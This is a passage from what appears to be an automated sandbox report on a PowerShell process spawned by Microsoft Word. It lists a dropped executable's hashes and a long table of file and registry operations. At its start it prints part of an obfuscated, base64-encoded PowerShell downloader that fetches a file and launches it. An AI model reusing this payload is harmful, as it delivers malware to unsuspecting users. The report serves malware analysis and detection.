OAHQAfQAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAG4AbAAnACwAJwBEAG8AdwAnACwAJwBvAGEAZABGAGkAbABlACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AHUAYABSAEwAfQAuACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgBnACcALAAnAGkAJwAsACcAVABvAFMAdAByACcAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAJAB7AFAAYABBAHQAaAB9ACkAOwAmACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwBTACcALAAnAHQAYQByAHQALQAnACwAJwBQAHIAbwBjAGUAcwBzACcAKQAgACQAewBQAEEAYABUAEgAfQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsALgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBpAHQAZQAtAGgAbwBzAHQAJwAsACcAcgAnACwAJwB3ACcAKQAgACQAewBfAH0ALgAiAEUAeABDAGAAZQBgAFAAVABpAE8ATgAiAC4AIgBtAGUAcwBzAGAAQQBgAGcAZQAiADsAfQB9AA0ACgA= |
| Initial Working Directory | C:\Users\ATVeyDl98Z\Desktop\ |
| Monitor | Start Time: 00:00:30, Reason: Child Process |
| Unmonitor | End Time: 00:02:34, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:04 |
| Information | Value |
|---|---|
| PID | 0xad4 |
| Parent PID | 0x9f8 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZJEWV7F\ATVeyDl98Z |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AD8
0x
AEC
0x
AF0
0x
AF4
0x
AF8
0x
AFC
0x
B10
0x
B20
0x
B24
0x
B28
0x
B30
0x
B34
0x
B5C
0x
B6C
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\atveydl98z\appdata\local\temp\38763.exe | 84.00 KB (86016 bytes) |
MD5:
1b1e6729790854252dfba6c77f198a4e
SHA1: 327c94b435802f77d12913956b28c70d00ab2de5 SHA256: 3939227998b7986b481eb9bc1a10dd1c5c02fc7ff9edbd25ad86a61307186d98 |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
13 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\ATVeyDl98Z\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096 |
|
41 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096 |
|
17 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096 |
|
62 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096 |
|
21 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
